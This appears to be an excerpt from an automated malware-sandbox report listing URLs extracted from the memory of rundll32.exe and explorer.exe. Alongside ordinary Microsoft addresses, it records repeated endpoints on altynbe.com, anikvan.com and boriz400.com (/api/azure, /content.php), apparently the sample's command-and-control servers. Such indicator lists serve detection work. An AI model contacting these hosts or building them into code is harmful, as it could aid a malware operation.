Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000016.00000000.1850142884.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.1847476814.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2941807069.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: Amcache.hve.9.dr	String found in binary or memory: http://upx.sf.net
Source: explorer.exe, 00000016.00000000.1859052974.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2945734291.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000016.00000002.2945734291.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/
Source: rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/5~
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/=~
Source: rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/B_F
Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/U~
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/X
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/api/azure
Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/api/azureontent.phpMfE
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/api/azurep
Source: rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/api/azureure
Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/content.php
Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/content.php2f
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/d
Source: rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/db-53011b87bd06
Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/ic
Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://altynbe.com/tyk.io
Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anikvan.com/
Source: rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anikvan.com/I~
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738816096.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anikvan.com/api/azure
Source: rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738816096.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anikvan.com/api/azure==
Source: rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anikvan.com/api/azuret.php.f
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anikvan.com/content.php
Source: rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anikvan.com/content.php.f
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anikvan.com/content.phpGf
Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anikvan.com/d
Source: rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anikvan.com/db-53011b87bd06
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://anikvan.com/ic
Source: explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000016.00000000.1845325737.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2938934418.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2937197092.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000016.00000000.1847916203.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000016.00000000.1847916203.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://boriz400.com/
Source: rundll32.exe, 00000012.00000003.2810418995.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921159E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.000002921159F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://boriz400.com/api/azure
Source: rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://boriz400.com/api/azure8
Source: rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://boriz400.com/api/azurey
Source: rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://boriz400.com/content.php
Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://boriz400.com/qa
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
